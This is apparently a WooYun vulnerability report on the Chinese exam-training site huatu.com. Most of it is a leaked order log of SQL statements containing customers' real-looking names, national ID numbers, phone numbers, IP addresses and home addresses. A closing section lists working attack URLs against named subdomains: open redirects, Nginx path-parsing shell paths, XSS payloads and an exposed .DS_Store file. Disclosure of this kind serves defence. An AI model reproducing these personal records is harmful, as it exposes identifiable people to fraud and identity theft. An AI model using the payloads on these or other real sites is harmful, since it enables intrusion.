INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2052263','S-P1450596084RN551','郑楚玲','440183198212225821','女','15918638599','[email protected]','','在职','','','','');
date:20151220153221
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450596642RN548','399047','1','99.00','0','60.191.246.38','1450596741','1','2','0','99','bm5.huatu.com','18705899883');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450596642RN548','399047','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('399047','S-P1450596642RN548','周锦阳','33078219890517065X','女','18705899883','[email protected]','','在职','','网络','华图网站','浙江省义乌市国际商贸城3区5楼1街29348');
date:20151220153423
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450596370RN751','2317159','1','2080.00','0','118.81.119.174','1450596863','1','2','0','2080','bm5.huatu.com','15934140183');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643409','S-P1450596370RN751','2317159','2015年太原尖草坪招教笔试','2080.00','1','TBTYJS01516','山西分校','太原总部','54','','400','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317159','S-P1450596370RN751','王晓丽','140181198706283067','女','15934140183','[email protected]','','在职','','网络','博客','');
date:20151220154152
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450597072RN489','2317171','1','10000.00','0','113.105.134.210','1450597312','1','2','0','10000','bm5.huatu.com','13662786043');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643931','S-P1450597072RN489','2317171','2016年东莞市教师招聘面试导师过关协议班TMSZJS11626','10000.00','1','TMSZJS11626','深圳分校','深圳总部','60','','2000','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317171','S-P1450597072RN489','钟雯','44142419920705226X','女','13662786043','[email protected]','','在职','','网络','华图网站','');
date:20151220154435
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450596571RN591','2317163','1','29.00','0','218.76.140.198','1450597475','1','2','0','29','bm5.huatu.com','18627380022');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('630537','S-P1450596571RN591','2317163','2016年湖南省公务员考试笔试娄底七点半课堂GSYSK51606A','29.00','1','GSYSK51606A','邵阳分校','娄底市分部','90','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317163','S-P1450596571RN591','刘旋','430681199405189318','男','18627380022','[email protected]','','应届','','网络','华图网站','湖南人文科技学院');
date:20151220154622
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450597413RN771','2317183','1','3680.00','0','61.164.149.46','1450597582','1','2','0','3680','bm5.huatu.com','15606970884');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('623870','S-P1450597413RN771','2317183','2016年福建省公务员笔试辅导课程','3680.00','1','GFZSK11602','福州分校','莆田分部','120','','1300','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317183','S-P1450597413RN771','徐芳菲','35030219940102002X','女','15606970884','[email protected]','','应届','','其它','朋友推荐','');
date:20151220154625
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450597373RN959','2317184','1','980.00','0','219.147.0.10','1450597585','1','2','0','980','bm5.huatu.com','13954236920');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('644273','S-P1450597373RN959','2317184','2015年青岛市国家海洋局面试辅导课程系统精讲班MQDSY01539','980.00','1','MQDSY01539','青岛分校','青岛总部','20','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317184','S-P1450597373RN959','张晓语','370785199108011227','女','13954236920','[email protected]','','应届','','','','');
date:20151220154840
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450597286RN966','2317181','1','99.00','0','183.234.62.104','1450597720','1','2','0','99','bm5.huatu.com','15019237422');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('637777','S-P1450597286RN966','2317181','2016年广州教师招聘笔试  教综精讲网络直播课程','99.00','1','TBGZJS016070','广州分校','广州总部','24','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317181','S-P1450597286RN966','杨华','410721198904103065','女','15019237422','[email protected]','','在职','','','','');
date:20151220154905
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450597708RN907','2317163','1','29.00','0','218.76.140.198','1450597745','1','2','0','29','bm5.huatu.com','18627380022');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('630537','S-P1450597708RN907','2317163','2016年湖南省公务员考试笔试娄底七点半课堂GSYSK51606A','29.00','1','GSYSK51606A','邵阳分校','娄底市分部','90','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317163','S-P1450597708RN907','刘旋','430681199405189318','女','18627380022','[email protected]','','应届','','网络','华图网站','湖南人文科技学院');
date:20151220155401
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450597832RN427','2312078','1','99.00','0','101.69.124.204','1450598041','1','2','0','99','bm5.huatu.com','18367811316');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450597832RN427','2312078','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2312078','S-P1450597832RN427','胡潇倩','330724199404281328','女','18367811316','[email protected]','','应届','','网络','QQ','浙江省东阳市歌山镇上宅村诚艺服饰对面');
date:20151220155920
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450597727RN904','2316276','1','4280.00','0','120.32.70.202','1450598360','1','2','0','4280','bm5.huatu.com','15880480915');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('632208','S-P1450597727RN904','2316276','2015年福建省事业单位面试辅导课程','4280.00','1','MFZSY01563','福州分校','福州总部','48','','400','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2316276','S-P1450597727RN904','黄群秀','350423199205254520','女','15880480915','[email protected]','','在职','','网络','华图网站','福州市西洋新村44座308');
date:20151220161447
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
		VALUES ('S-P1450599003RN999','2317224','1','12800.00','0','1.81.195.200','1450599287','1','2','0','11800','bm5.huatu.com','17792183179');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('627570','S-P1450599003RN999','2317224','2016年陕西省公务员考试笔试辅导课程','12800.00','1','GXASK01603A','陕西分校','西安总部','288','','2000','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
			 VALUES ('2317224','S-P1450599003RN999','赵纬君','612329199112300223','女','17792183179','[email protected]','','其它','','','','');

漏洞证明:

0x02:三处URL跳转:

http://youxue.huatu.com/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D
http://wenku.huatu.com/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D
http://v.huatu.com/htnews/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D


0x03:Nginx解析漏洞可shell:

http://v.huatu.com/robots.txt/a.php
http://ahwx.huatu.com/robots.txt/a.php
http://passport.huatu.com/robots.txt/a.php
http://m.v.huatu.com/public/css/css.css/a.php
http://cps.huatu.com/static/css/css.css/a.php


0x04:XSS:

http://ask.huatu.com/user/ssologin.html?returnUrl=--%3E%27%22%3E%3CH1%3EXSS%3C%2FH1%3E
http://cps.huatu.com/index.php/home/gourl/?url=http%3A%2F%2Fv.huatu.com%2Fanhui%2Fcg%2F&source=--%3E%27%22%3E%3CH1%3EXSS%3C%2FH1%3E&web=web


0x05DS_Store:

http://tiku.huatu.com/.DS_Store


如图:

2015-12-20_163609.png

修复方案:

我是来找礼物的.
我是来找礼物的.
我是来找礼物的.

版权声明:转载请注明来源 带头大哥@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-12-22 10:16

厂商回复:

感谢 发布

最新状态:

暂无